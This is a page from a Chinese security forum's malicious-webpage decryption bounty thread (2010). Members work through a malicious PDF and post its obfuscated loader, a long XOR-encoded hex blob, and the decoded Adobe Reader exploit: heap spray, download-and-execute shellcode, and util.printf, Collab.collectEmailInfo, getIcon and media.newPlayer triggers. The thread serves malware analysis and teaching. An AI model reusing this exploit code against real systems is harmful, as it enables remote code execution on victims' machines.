网马解密悬赏第四十八期(已结束) - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流网马解密悬赏第四十八期(已结束)

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十六次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

2 / 3 页

跳转页

[悬赏] 网马解密悬赏第四十八期(已结束)

本主题由大版主 networkedition 于 2010-4-12 10:13:48 执行关闭主题/取消操作

jks_风锋芒艾服狮帖子:2235 注册: 2009-12-17 来自:China	发表于： 2010-04-10 18:54 \| 短消息资料字号：小中大 11楼回复: 网马解密悬赏第四十八期我稍稍有点纠结，自己解出来的貌似不和大家伙的一样。 hXXp://googlenew.cn/mmm/exe.php 先加载第一步加载.jpg (320.87 K) 2010-4-10 18:54:22 放到malzilla中运行脚本运行脚本.jpg (405.14 K) 2010-4-10 18:54:22 得到shellcode 得到shellcode.jpg (285.94 K) 2010-4-10 18:54:22 貌似和梅罗的有点不大一样。。。解密后的shellcode.jpg (100.54 K) 2010-4-10 18:54:22 直接解密得到的地址，但是下载不下来，梅罗说这还没完，我于是就生成了下下exe shellcode生成exe.jpg (37.43 K) 2010-4-10 18:54:22 生成了exe后放到C32下看了下，也是和shellcode解出来的一样。。。我纠结了，而且我的shellcode代码和梅罗的不大一样。。地址一样.jpg (121.07 K) 2010-4-10 18:54:22 有点晕
jks_风锋芒艾服狮帖子:2235 注册: 2009-12-17 来自:China

是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰	发表于： 2010-04-10 19:15 \| 短消息资料字号：小中大 12楼回复 11F jks_风的帖子这应该是孔子上次解的PDF中的内容 My Blog
是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰

辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:	发表于： 2010-04-10 20:54 \| 短消息资料字号：小中大 13楼回复: 网马解密悬赏第四十八期引用: 原帖由 jks_风于 2010-4-10 18:54:00 发表我稍稍有点纠结，自己解出来的貌似不和大家伙的一样。 hXXp://googlenew.cn/mmm/exe.php 放到malzilla中运行脚本得到shellco 忘了清空缓存了要深入，要专一.......
辛达星郁锋芒艾服狮帖子:1507 注册: 2008-07-17 来自:

梅罗自信弱冠狮帖子:430 注册: 2010-01-18 来自:永烁星光之地	发表于： 2010-04-10 21:09 \| 短消息资料字号：小中大 14楼回复 11F jks_风的帖子你那个。。是上次的。。你没有清空缓存。。。你点加载PDF 然后点数据流。。。然后解压会出来新的。。天地间那一抹不灭的流光即我
梅罗自信弱冠狮帖子:430 注册: 2010-01-18 来自:永烁星光之地

kekao 快乐黄口狮帖子:151 注册: 2008-03-08 来自:	发表于： 2010-04-10 21:13 \| 短消息资料字号：小中大 15楼回复 14F 梅罗的帖子加载PDF 然后点数据流,能找到下载地址吗?找了半天也没发现.学习一下.
kekao 快乐黄口狮帖子:151 注册: 2008-03-08 来自:

梅罗自信弱冠狮帖子:430 注册: 2010-01-18 来自:永烁星光之地	发表于： 2010-04-10 21:41 \| 短消息资料字号：小中大 16楼回复 15F kekao 的帖子找不到直接的下载地址的只能获取到含有加密之后网马的代码~ 这个貌似是Adober的缓冲区溢出漏洞的网马。藏PDF里了天地间那一抹不灭的流光即我
梅罗自信弱冠狮帖子:430 注册: 2010-01-18 来自:永烁星光之地

wanmimi 初生襁褓狮帖子:13 注册: 2010-03-31 来自:	发表于： 2010-04-10 23:17 \| 短消息资料字号：小中大 17楼回复: 网马解密悬赏第四十八期 <SCRIPT LANGUAGE="vbscript"> var googleA=this; var send=["","e","l","a","v"]; unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]); var a=["Word","","getPa","geNth"]; unlockAdobe=new String(a[2]+a[3]+a[0]+a[1]); var getAdobe=["Pag","mWo","get","rds","eNu",""]; mail=new String(getAdobe[2]+getAdobe[0]+getAdobe[4]+getAdobe[1]+getAdobe[3]+getAdobe[5]); var b=["s","n","a","e","c","u","e","p",""]; d=new String(b[5]+b[1]+b[3]+b[0]+b[4]+b[2]+b[7]+b[3]+b[8]); var google=["deA","cha","rCo","t",""]; mailGoogle=new String(google[1]+google[2]+google[0]+google[3]+google[4]); var googleC=["","harCo","fromC","de"]; dD=new String(googleC[2]+googleC[1]+googleC[3]+googleC[0]); var googleGet=["a","p","","p"]; get=new String(googleGet[0]+googleGet[1]+googleGet[1]+googleGet[2]); var adobe=String("%"); var aA=2; var mailGet=String; var bB=0; var editSend=100; var get=googleA[get]; var getD=2; var aEdit=googleA[d]; var c=googleA[mail](getD); var googleB=""; for(var googleCUnlock=bB; googleCUnlock<c;googleCUnlock+=1) { sendD=googleA[unlockAdobe](getD,googleCUnlock); var adobeD=sendD.substr(sendD.length-aA,aA); var googleMail=aEdit(adobe+adobeD); var sendDSend=googleMail[mailGoogle](bB); var mailB=sendDSend^editSend; googleB+=mailGet[dD](mailB); } this[unlock](googleB); 这是eval </script> 不知道怎么输出来，改为alert不成~
wanmimi 初生襁褓狮帖子:13 注册: 2010-03-31 来自:

梅罗自信弱冠狮帖子:430 注册: 2010-01-18 来自:永烁星光之地	发表于： 2010-04-11 00:34 \| 短消息资料字号：小中大 18楼回复: 网马解密悬赏第四十八期 <SCRIPT LANGUAGE="vbscript"> //这里貌似应该是<SCRIPT LANGUAGE="javascript“> var googleA=this; var send=["","e","l","a","v"]; unlock=new String(send[1]+send[4]+send[3]+send[2]+send[0]); unlock=eval; var a=["Word","","getPa","geNth"]; unlockAdobe=new String(a[2]+a[3]+a[0]+a[1]); unlockAdobe=getPageNthWord; var getAdobe=["Pag","mWo","get","rds","eNu",""]; mail=new String(getAdobe[2]+getAdobe[0]+getAdobe[4]+getAdobe[1]+getAdobe[3]+getAdobe[5]); mail=getPageNumWords; var b=["s","n","a","e","c","u","e","p",""]; d=new String(b[5]+b[1]+b[3]+b[0]+b[4]+b[2]+b[7]+b[3]+b[8]); d=unescape; var google=["deA","cha","rCo","t",""]; mailGoogle=new String(google[1]+google[2]+google[0]+google[3]+google[4]); mailGoogle=charCodeAt; var googleC=["","harCo","fromC","de"]; dD=new String(googleC[2]+googleC[1]+googleC[3]+googleC[0]); dD=fromCharCode; var googleGet=["a","p","","p"]; get=new String(googleGet[0]+googleGet[1]+googleGet[1]+googleGet[2]); get=app; var adobe=String("%"); adobe=%; var aA=2; var mailGet=String; var bB=0; var editSend=100; var get=googleA[get]; get=this[app]; var getD=2; var aEdit=googleA[d]; aEdit=this[unescape]; var c=googleA[mail](getD); c=this[getPageNumWords](2); var googleB=""; for(var googleCUnlock=bB; googleCUnlock<c;googleCUnlock+=1) //for(var googleCUnlock=0;googleCUnlock<this[getPageNumWords](2);googleCUnlock+=1)循环开始；条件是this指针指向的函数实际就是pdf某页包含的词的数目，参数是2这里应该是第二页 { sendD=googleA[unlockAdobe](getD,googleCUnlock); //sendD=this[getPageNthWord](2,googleCUnlock); 这里也是一样根据this指针生成sendD；这里是取得第二页的各个数据段的代码，所以这里呢以下函数操作的代码应该是数据流第二页的代码，这就是kekao你eval函数输出不来的原因，因为没有函数操作源代码@@；（kekao同学看这里，我重新编辑一下帖子，符上截图，你自己看吧，另外楼下应该很详细了）所以去PDF里找数据段2的代码，截图如下： 1.jpg (193.27 K) 2010-4-11 17:05:48 猜想末尾是16进制数这样的代码是之前xor的，尝试去掉7ae3f8 保留末尾十六进制数；再用该整段函数解密。 var adobeD=sendD.substr(sendD.length-aA,aA); //adobeD=send.substr(sendD.length-2,2);这里根据sendD生成adobeD； var googleMail=aEdit(adobe+adobeD); //googleMail=this[unescape](%+adobeD);根据this指针指向通过对adobeD字符串进行unescape操作；这里说一下： unescape方法返回一个包含 charstring 内容的字符串值。所有以 %xx 十六进制形式编码的字符都用 ASCII 字符集中等价的字符代替。以 %uxxxx 格式（Unicode 字符）编码的字符用十六进制编码 xxxx 的 Unicode 字符代替. var sendDSend=googleMail[mailGoogle](bB); //sendDsend=googleMail[charCodeAt](0); 继续说：这里写成JS标准形式其实是sendDsend=googleMail.charCodeAt(0) ；charCodeAt(index)方法可返回指定位置的字符的 Unicode 编码。index参数的意思是字符在字符串的下标 0是第一个，例子在字符串string="Hello world!" 中，我们如果是用string.charCodeAt(1)将返回位置 1 的字符的 Unicode 编码101； var mailB=sendDSend^editSend; //mailB=sendDsend^100; 这里是个关键说明上面取出来的代码是经过xor 100的。所以解密的时候要在参数里填上100 选择xor运算； googleB+=mailGet[dD](mailB); //google+=String[fromCharCode](mailB); 这里实际上是在""里不断的添加字符；同样，写成JS标准形式是String.fromCharCode(mailB)，fromCharCode() 方法可接受一个指定的 Unicode 值，然后返回一个字符串。例子document.write(String.fromCharCode(72,69,76,76,79))，将出现HELLO } this[unlock](googleB); //this[eval](googleB);这里是eval函数 </script> ----------------------------------------华丽的分割线---------------------------------- 本人JS不精通，能力有限，全是自己的看法，有错误请各位大牛见谅；梅罗最后编辑于 2010-04-11 22:14:51 天地间那一抹不灭的流光即我
梅罗自信弱冠狮帖子:430 注册: 2010-01-18 来自:永烁星光之地

DragonKid 自信弱冠狮帖子:496 注册: 2009-12-31 来自:	发表于： 2010-04-11 00:44 \| 短消息资料字号：小中大 19楼回复：网马解密悬赏第四十八期我来晚了~~ 只能学习了~~
DragonKid 自信弱冠狮帖子:496 注册: 2009-12-31 来自:

250662772 卡卡反病毒小组帖子:49 注册: 2008-12-21 来自:	发表于： 2010-04-11 16:26 \| 短消息资料字号：小中大 20楼回复: 网马解密悬赏第四十八期 pdf解压之后整理这段数据 QQ截图未命名.jpg (531.13 K) 2010-4-11 16:25:55 其实就是16进制,不过进行了xor运算解密函数在这里 1.jpg (241.75 K) 2010-4-11 16:25:55 整理之后的16进制代码引用: 6e6d120516441716073b100506080144594446050607000102030c0d0e0f08090a0b14151617101112131c1d1e252627202122232c2d2e2f28292a2b34353637303132333c3d3e54555657505152535c5d544b4a5e3b495b425941465f6e6d12051644000117103b10050608015944461c055c5732512b2e42210a08542c141549102a1d060f013d3e4107372529300e532f223c260b2d3b162752202859540c1323000211503612035e551e3517090d34564b5d5b334a31465f6e120516440c1330085d200a4459440a011344251616051d4c4d5f4444696e696e02110a07100d0b0a440301103b170c010808070b00014c0a0509014d441f696e696e6d12051644114459440301103b1116084c4d5f696e6d12051644174459444641112754575741115c26525041115754505441115427535c411150545c2641115c26542741115527535441115c2625204111545c515c4111545d2126411150545c2641115c2057504111532750544111515c5c26411152255727411151255050411121562055411121565626411121275c26411150222126411151565125411121255c5741115c5d5152411154505151411151535152411153575c2641115c26572741115757535041115457535c411151522257411153525c264111545756544111575722574111505d275d41115055515441115757252041115752222241112621542241115457555041112256575c4111545c535041112722275541115457542041115054222541112122212641115726515c41115351225c411151212151411150525c26411154575650411152522757411154275c2641115c26505c411155275152411120575457411154505c26411154575c2541115122275741115154512141115c2027574111545c532041115156515341115757265c41115c2527254111215c5126411122222556411122222222411127545756411122535c264111252122564111265c50224111562152514111535c5251411152522526411152525d5c41112654252641115c25522741115d5c21544111525c515441115221522241115250562141115351525c41115227535641115150522041115c21265c411154215021411122222127411154505151411151545d5741112754575741115154515441115c265152411154505151411127565c5741115c57532241115755275641115154515641115752265c4111562255254111222253544111545051514111575751264111515322224111265c5152411122215d5c411154215c2541115151222241115153545041112122265c411121542721411122225254411154505151465f696e6d174f5944115f696e6d16011011160a44110a0117070514014c174d5f696e19696e696e696e02110a07100d0b0a440301103b1116084c4d1f44696e6d12051644171016445944100c0d174a0d0a020b4a0511100c0b165f696e6d12051644160110445944010a070b00013b1710164c1710164844000117103b100506080148441716073b10050608014d5f696e696e6d16011011160a441601105f696e195f696e696e696e02110a07100d0b0a44010a070b00013b1710164c17101648441716073b10050608014844000117103b10050608014d1f696e696e6d120516441601105946465f696e6d020b164c120516440d59545f440d4458441710164a08010a03100c5f440d4f4f4d696e6d1f696e6d6d120516440d0a00011c4459441716073b10050608014a0d0a00011c2b024c1710163f0d394d5f696e6d6d0d024c0d0a00011c445a444955444d696e6d6d1f696e6d6d6d160110444f5944000117103b10050608013f0d0a00011c395f696e6d6d19696e6d19696e696e6d16011011160a441601105f696e195f696e696e696e02110a07100d0b0a4436155012551527274c34201637073e0e504844011e511428524d1f44444444696e696e6d130c0d0801444c34201637073e0e504a08010a03100c444e4456445844011e511428524d1f444444444444696e6d6d34201637073e0e50444f594434201637073e0e505f44444444696e6d1944444444696e696e6d34201637073e0e5044594434201637073e0e504a1711061710160d0a034c544844011e51142852444b44564d5f4444444416011011160a4434201637073e0e505f4444696e194444696e696e02110a07100d0b0a441c5c211230094c2d533054120f0b514d1f4444696e696e6d12051644153426105320445944541c54075407540754075f4444444444444444696e696e6d2a360e0e365233524459440301103b170c010808070b00014c46140002464d5f696e696e6d0d02444c2d533054120f0b5144595944554d1f153426105320445944541c57545754575457545f19696e696e6d1205164422013515553212445944541c5054545454545f444444696e6d120516441017371e37074459442a360e0e365233524a08010a03100c444e44565f4444444412051644011e51142852445944220135155532124449444c1017371e3707444f44541c575c4d5f44444444696e6d1205164434201637073e0e50445944110a0117070514014c4641115d545d5441115d545d54464d5f44444444696e696e6d34201637073e0e5044594436155012551527274c34201637073e0e504844011e511428524d5f44444444696e696e6d120516441c525636052629574459444c153426105320444944541c5054545454544d444b44220135155532125f44444444696e696e6d020b16444c120516442b0e05020b0e445944545f442b0e05020b0e4458441c525636052629575f442b0e05020b0e444f4f444d1f44444444696e6d6d0c1330085d200a3f2b0e05020b0e3944594434201637073e0e50444f442a360e0e365233525f44444444696e6d19696e194444696e696e02110a07100d0b0a44315631073d2f164c4d1f444444696e696e120516442d1d2d2232014459440514144a120d01130116320116170d0b0a4a100b3710160d0a034c4d5f44444444444444444444696e696e6d0d02444c2d1d2d223201445a445c4d696e6d1f696e6d6d1c5c211230094c554d5f696e6d6d120516440d321227001d5c4459444655565d5d5d5d5d5d5d5d5d5d5d5d5d5d5d5d5d5d465f44444444444444444444696e696e6d6d020b16444c3612315103092b21445944545f443612315103092b214458445653525f443612315103092b21444f4f444d696e6d6d1f696e6d6d6d0d321227001d5c444f5944465c465f444444696e6d6d19696e696e6d6d11100d084a14160d0a10024c46415051545454024648440d321227001d5c4d5f444444444444696e6d19696e696e696e0d02444c2d1d2d2232014458445c4d1f696e696e6d1c5c211230094c544d5f44444444696e6d12051644312a3c0527302c06445944110a0117070514014c46411154075407411154075407464d5f44444444696e696e6d130c0d0801444c312a3c0527302c064a08010a03100c44584450505d51564d44312a3c0527302c06444f5944312a3c0527302c065f44444444696e696e6d100c0d17444a070b0808050637100b1601445944270b080805064a070b08080107102109050d082d0a020b4c1f44444444444444441711060e445e4446464844091703445e44312a3c0527302c06194d5f444444444444696e1944444444444444696e696e0d02444c2d1d2d2232014458445d4a554d1f696e696e6d0d02444c0514144a000b074a270b080805064a0301102d070b0a4d696e6d1f696e6d6d1c5c211230094c544d5f44696e4444444444444444120516440123362131302a13445944110a0117070514014c4641545d464d5f44444444444444444444696e6d6d130c0d0801444c0123362131302a134a08010a03100c445844541c505454544d0123362131302a13444f59440123362131302a135f696e696e6d6d0123362131302a13445944462a4a46444f440123362131302a135f44444444696e696e6d6d0514144a000b074a270b080805064a0301102d070b0a4c0123362131302a134d5f444444696e6d19696e19444444696e0d02444c2d1d2d223201445959445d4a564d1f4444444444444444696e6d1c5c211230094c554d5f4444444444444444444444444444696e6d11100d084a14160d0a10004c46554a5454545454545454544a5454545454545454544a55575753445e44574a55574a57534648440a011344200510014c4d4d5f4444444444444444444444696e6d10161d44696e6d1f6d696e6d6d0901000d054a0a01133408051d01164c0a1108084d5f4444444444444444444444444444696e6d1944070510070c4c014d44696e6d1f19696e6d11100d084a14160d0a10004c46554a5454545454545454544a5454545454545454544a55575753445e44574a55574a57534648440a011344200510014c4d4d5f696e19696e696e19696e696e315631073d2f164c4d5f696e696e 引用: var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%"; var dest_table= "xa83V5OJ&Enl0Hpq-tNybkeYZ%cSAMTj7KFXBoI_rC6DL=0hwGdfu4Rvg:1zQsmiP2/9?W.U"; var hwTl9Dn = new Array(); function get_shellcode(name) { var u = get_url(); var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455"; s+= u; return unescape(s); } function get_url(){ var str = this.info.author; var ret = encode_str(str, dest_table, src_table); return ret; }; function encode_str(str, src_table, dest_table){ var ret=""; for(var i=0; i < str.length; i++) { var index = src_table.indexOf(str); if(index > -1 ) { ret += dest_table[index]; } } return ret; }; function Rq4v1qCC(PDrScZj4, ez5pL6){ while (PDrScZj4.length * 2 < ez5pL6){ PDrScZj4 += PDrScZj4; } PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4; } function x8EvTm(I7T0vko5){ var qPBt7D = 0x0c0c0c0c; NRjjR6W6 = get_shellcode("pdf"); if (I7T0vko5 == 1){qPBt7D = 0x30303030;} var FeQq1Vv = 0x400000; var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38); var PDrScZj4 = unescape("%u9090%u9090"); PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6); var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv; for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){ hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6; } } function U2UcYKr(){ var IyIFVe = app.viewerVersion.toString(); if (IyIFVe > 8) { x8EvTm(1); var iVvCdy8 = "12999999999999999999"; for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ) { iVvCdy8 += "8"; } util.printf("%45000f", iVvCdy8); } if (IyIFVe < 8){ x8EvTm(0); var UNXaCTHb = unescape("%u0c0c%u0c0c"); while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb; this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb}); } if (IyIFVe < 9.1){ if (app.doc.Collab.getIcon) { x8EvTm(0); var eGREUTNw = unescape("%09"); while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw; eGREUTNw = "N." + eGREUTNw; app.doc.Collab.getIcon(eGREUTNw); } } if (IyIFVe == 9.2){ x8EvTm(1); util.printd("1.000000000.000000000.1337 : 3.13.37", new Date()); try { media.newPlayer(null); } catch(e) {} util.printd("1.000000000.000000000.1337 : 3.13.37", new Date()); } } U2UcYKr(); 本帖被评分 1 次本帖被评分 1 次
250662772 卡卡反病毒小组帖子:49 注册: 2008-12-21 来自:

<<上一主题|下一主题>>

2 / 3 页

跳转页

页面顶部

Powered by Discuz!NT